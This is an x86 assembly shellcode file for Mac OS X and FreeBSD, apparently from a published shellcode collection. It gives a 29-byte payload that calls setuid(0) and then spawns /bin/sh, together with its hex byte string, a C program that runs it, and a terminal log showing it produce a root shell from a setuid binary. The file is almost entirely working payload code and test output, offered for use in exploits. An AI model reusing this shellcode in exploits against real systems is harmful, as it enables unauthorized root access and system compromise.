; Shellcode-Desc .: setuid(0) + execve() of /bin/sh
; Shellcode-Size .: 29 bytes
; Shellcode-Id ...: a514b18340a690e6553861ef5d530eef 
; Shellcode-Arch .: x86
; Nasm-Version ...: NASM version 0.98.40 (Apple Computer, Inc. build 9) compiled on Apr  6 2006
; Ndisasm-Version : NDISASM version 0.98.40 (Apple Computer, Inc. build 9) compiled Apr  6 2006
; Tested-OSs .....: Mac OS X 10.4.x , FreeBSD 5.5-STABLE
;
; RageMan <rageman@olografix.org>
;         <rageman@s0ftpj.org>
;
; Eva:~/shellcodes rageman$ nasm execve-0x03.asm -fmacho
; Eva:~/shellcodes rageman$ ld -o execve-0x03 execve-0x03.o 
; Eva:~/shellcodes rageman$ sudo chmod 4777 execve-0x03
; Eva:~/shellcodes rageman$ sudo chown root execve-0x03 
; Eva:~/shellcodes rageman$ ./execve-0x03 
; Eva:/Users/rageman/shellcodes root# id
; uid=0(root) gid=501(rageman) groups=501(rageman), 81(appserveradm), 79(appserverusr), 80(admin)
; Eva:/Users/rageman/shellcodes root# exit
; exit
; Eva:~/shellcodes rageman$ gcc -w -o execve-0x03 execve-0x03.c 
; Eva:~/shellcodes rageman$ sudo chmod 4777 execve-0x03
; Eva:~/shellcodes rageman$ sudo chown root execve-0x03
; Eva:~/shellcodes rageman$ ./execve-0x03
; Eva:/Users/rageman/shellcodes root# id
; uid=0(root) gid=501(rageman) groups=501(rageman), 81(appserveradm), 79(appserverusr), 80(admin)
; Eva:/Users/rageman/shellcodes root# exit
;
; <---execve-0x03.c-->
; char shellcode[] =
;        "\x31\xc0\x50\x50\xb0\x17\xcd\x80"
;        "\x68\x2f\x2f\x73\x68\x68\x2f\x62"
;        "\x69\x6e\x89\xe3\x50\x54\x54\x53"
;        "\x50\xb0\x3b\xcd\x80";
;
; int main()
; {
;         void (*fp)() = shellcode;
;         fp();
; }
; <-/-execve-0x03.c-->

BITS 32

GLOBAL _main

_main:
                       ; setuid()
xor eax, eax	       ; prepare uid_t 0
push eax	       ; push uid_t into the stack
push eax	       ; dummy
mov al, 0x17           ; value of SYS_setuid
int 0x80	       ; invoke kernel

                       ; execve arguments
push 0x68732f2f        ; put hs// into the stack 
push 0x6e69622f        ; put nib/ into the stack  
mov ebx, esp           ; write string address into ebx 

                       ; execve()
push eax               ; char *const envp[]
push esp               ; char *const argv[]
push esp               ; 
push ebx               ; const char *path
push eax               ; dummy
mov  al, 0x3b          ; value of SYS_execve
int 0x80               ; invoke kernel